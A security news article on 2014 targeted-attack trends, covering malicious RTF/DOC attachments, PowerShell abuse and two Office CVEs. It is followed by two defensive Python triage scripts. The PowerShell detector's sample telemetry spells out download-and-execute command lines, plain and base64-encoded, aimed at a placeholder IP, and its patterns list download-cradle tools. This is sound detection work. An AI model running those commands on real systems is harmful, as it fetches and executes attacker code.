RTF and DOC Files Used in Majority of Targeted Attacks
Analysis of attack trends in 2014 reveals that tainted .RTF and .DOC files were the file types most often employed in email-based targeted attacks, accounting for a combined 46% of malicious document types, according to a new study.
2014 also saw further refinements in targeted attack methodologies: as more organizations upgraded to newer versions of Windows, the development of 64-bit malware increased.
“Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack,” the report states.
The move to newer versions of Windows has also increased the abuse of legitimate tools and features in targeted attacks, most notably malicious document templates and PowerShell. PowerShell ships with Windows 7 and later and is designed to let system administrators access and automate system features without a graphical user interface (GUI), which makes it equally convenient for an attacker who already has a foothold.
“PowerShell commands were abused to download malicious files and bypass execution policies, which allowed the downloaded files to be executed,” the researcher noted.
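The abuse described in the two paragraphs above (an execution-policy bypass combined with a download cradle) leaves a recognisable fingerprint on process-creation telemetry. The following Python script is an added example, not code from the report or from this page: it runs a simple triage over constructed Sysmon-style process records (the PIDs, parent images and command lines are made up for illustration), decodes any `-EncodedCommand` payload back to its UTF-16LE plaintext, and flags the bypass, hidden-window, download-cradle and Office-parent indicators. The parameter abbreviations it matches (`-ep`, `-exec`, `-w`, `-enc`) are the short forms PowerShell itself accepts.

```python
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# patterns cover the short forms attackers use (-ep, -exec, -w, -enc, -e ...).
RE_EXEC_POLICY = re.compile(r"-e[a-z]*\s+(?:bypass|unrestricted)\b", re.I)
RE_HIDDEN = re.compile(r"-w[a-z]*\s+hidden\b", re.I)
RE_ENCODED = re.compile(r"-e(?:c|nc(?:oded(?:command)?)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RE_CRADLE = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|"
    r"\biwr\b|Start-BitsTransfer|Invoke-Expression|\biex\b", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; return the plaintext or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except ValueError:          # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyse_event(event):
    """Return the list of suspicious traits found on one process-creation record."""
    cmd = event["cmd"]
    image = cmd.split()[0].strip('"').rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return []
    findings = []
    if RE_EXEC_POLICY.search(cmd):
        findings.append("execution-policy bypass")
    if RE_HIDDEN.search(cmd):
        findings.append("hidden window")
    scan_text = cmd
    m = RE_ENCODED.search(cmd)
    if m:
        findings.append("encoded command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            scan_text += "\n" + decoded     # inspect the plaintext, not just the base64
    if RE_CRADLE.search(scan_text):
        findings.append("download cradle")
    if event.get("parent", "").lower() in OFFICE_PARENTS:
        findings.append("spawned by Office application")
    return findings


def triage_events(events):
    """Map PID -> findings for every record that raised at least one indicator."""
    hits = {}
    for event in events:
        findings = analyse_event(event)
        if findings:
            hits[event["pid"]] = findings
    return hits


# --- constructed sample telemetry (hypothetical, for illustration only) -------
PLAIN_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p')"
ENCODED_PAYLOAD = base64.b64encode(PLAIN_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "WINWORD.EXE",     # document-spawned shell
     "cmd": "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
            "-Command \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.exe',"
            "'C:\\Users\\Public\\a.exe'); Start-Process 'C:\\Users\\Public\\a.exe'\""},
    {"pid": 4133, "parent": "explorer.exe",    # bypass plus encoded cradle
     "cmd": "powershell.exe -ep bypass -enc " + ENCODED_PAYLOAD},
    {"pid": 5002, "parent": "explorer.exe",    # ordinary admin script
     "cmd": "powershell.exe -NoProfile -File C:\\Scripts\\Backup-Logs.ps1"},
    {"pid": 5100, "parent": "services.exe",    # not PowerShell at all
     "cmd": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for pid, findings in triage_events(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```

An execution-policy bypass is not a vulnerability in itself: the policy is a safety rail rather than a security boundary, and `-ExecutionPolicy Bypass` is a documented switch. That is why the script reports the combination of indicators rather than any one of them; a PowerShell process whose parent is WINWORD.EXE and whose command line fetches and starts an executable is the pattern worth alerting on.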
“A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.”
The number of zero-day exploits used in targeted attacks also increased significantly in 2014. One example was the pair of Taidoor-related attacks exploiting CVE-2014-1761, a memory-corruption vulnerability in Microsoft Word's RTF parser (patched in MS14-017), which targeted government agencies and an educational institution in Taiwan.
“Exploiting new vulnerabilities has been proven to be more effective because security vendors have yet to create patches. Zero-day exploits can catch vendors and victims alike unawares,” the report said.
Older, better-known vulnerabilities continued to be a factor, as attackers rely on “tried-and-tested” exploits, many of which are available for purchase in exploit kits on the black market.
CVE-2012-0158, a buffer overflow in the MSCOMCTL.OCX ActiveX control used by Microsoft Office (patched in MS12-027), remained the most exploited vulnerability in targeted attacks in the first half of 2014; two notable campaigns, PLEAD and Operation Pawn Storm, both leveraged it to infiltrate targeted networks.
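The three document-borne vectors on this page (malicious .RTF and .DOC attachments in general, the CVE-2014-1761 RTF parser bug, and CVE-2012-0158 delivered through an embedded MSCOMCTL control) share a delivery format that can be triaged without opening the file. The Python script below is an added example, not code from the report or from any of the campaigns named: it types an attachment by magic bytes rather than by extension, notes a truncated `{\rt` header (Word opens such files, and some exploit documents use the shortened form to slip past naive scanners), reports the `\objocx` (embedded OLE/ActiveX control) and `\objupdate` (refresh the object on open) control words, and parses each `\objdata` blob's OLE 1.0 header as laid out in MS-OLEDS to recover the object class name and check whether the native payload is an OLE2 compound file. Both sample documents, the 512-byte stand-in container and the class name `Example.Control.1` are constructed for this example. It does not handle `\bin` binary runs or CVE-specific signatures; for those, a dedicated tool such as oletools' rtfobj is the right next step.

```python
import binascii
import re
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file (.doc, embedded objects)

# RTF control words worth reporting on an e-mailed attachment: \objocx marks an
# embedded OLE/ActiveX control, \objupdate tells Word to refresh the object as
# soon as the document opens, so the control is loaded without user interaction.
SUSPICIOUS_CONTROL_WORDS = ("\\objocx", "\\objupdate")

RE_OBJDATA = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def classify_attachment(data):
    """Cheap first-pass typing by magic bytes rather than by file extension."""
    if data.startswith(b"{\\rtf1"):
        return "rtf"
    if data.startswith(b"{\\rt"):           # truncated header; Word still opens it
        return "rtf-malformed-header"
    if data.startswith(CFB_MAGIC):
        return "ole2"                        # classic .doc/.xls; hand to an OLE parser
    return "other"


def parse_ole1_object(blob):
    """Parse the OLE 1.0 object header that \\objdata carries (MS-OLEDS 2.2.5).

    Layout: OLEVersion(4) FormatID(4) ClassName TopicName ItemName, each a
    4-byte length (including the NUL) followed by the ANSI string, then
    NativeDataSize(4) and the native data itself.
    """
    if len(blob) < 12:
        return None
    ole_version, format_id = struct.unpack_from("<II", blob, 0)
    pos, names = 8, []
    for _ in range(3):
        if pos + 4 > len(blob):
            return None
        (n,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        if n > 1024 or pos + n > len(blob):  # absurd length: header is not OLE1
            return None
        names.append(blob[pos:pos + n].rstrip(b"\x00").decode("latin-1"))
        pos += n
    if pos + 4 > len(blob):
        return None
    (size,) = struct.unpack_from("<I", blob, pos)
    native = blob[pos + 4:pos + 4 + size]
    return {
        "ole_version": ole_version,
        "format_id": format_id,              # 2 = embedded object, 1 = link
        "class_name": names[0],
        "native_size": size,
        "is_cfb": native.startswith(CFB_MAGIC),   # payload is an OLE2 container
        "truncated": len(native) < size,
    }


def triage_rtf(data):
    """Report header state, suspicious control words and every embedded object."""
    kind = classify_attachment(data)
    report = {"kind": kind, "control_words": [], "objects": []}
    if not kind.startswith("rtf"):
        return report
    report["control_words"] = [cw for cw in SUSPICIOUS_CONTROL_WORDS
                               if cw.encode("ascii") in data]
    for m in RE_OBJDATA.finditer(data):
        hexdata = re.sub(rb"\s", b"", m.group(1))    # hex may be wrapped across lines
        try:
            blob = binascii.unhexlify(hexdata)
        except binascii.Error:
            report["objects"].append({"error": "odd-length or non-hex \\objdata"})
            continue
        report["objects"].append(parse_ole1_object(blob) or {"error": "bad OLE1 header"})
    return report


# --- constructed samples (hypothetical, not real malware) ---------------------
def build_ole1_blob(class_name, native_data):
    cn = class_name.encode("ascii") + b"\x00"
    return (struct.pack("<II", 0x501, 2) + struct.pack("<I", len(cn)) + cn
            + struct.pack("<II", 0, 0)                  # empty TopicName, ItemName
            + struct.pack("<I", len(native_data)) + native_data)

FAKE_CFB = CFB_MAGIC + b"\x00" * 504   # 512-byte stand-in for an OLE2 container
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\pard Hello.\\par}"
SUSPICIOUS_RTF = (
    b"{\\rt\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\pard Quarterly report attached.\\par"
    b"{\\object\\objocx\\objupdate{\\*\\objclass Example.Control.1}"   # hypothetical class
    b"{\\*\\objdata " + binascii.hexlify(build_ole1_blob("Example.Control.1", FAKE_CFB)) + b"}}}"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_RTF), ("suspicious", SUSPICIOUS_RTF)):
        print(name, triage_rtf(sample))
```

The useful output is the combination: a malformed header, an `\objocx` control that updates itself on open, and a native payload that is itself an OLE2 container is a document that deserves detonation in a sandbox before anyone in the target organisation double-clicks it. The class name recovered from the OLE1 header is what you would compare against the ProgIDs and CLSIDs in your own rule set for CVE-2012-0158 and similar control-based exploits.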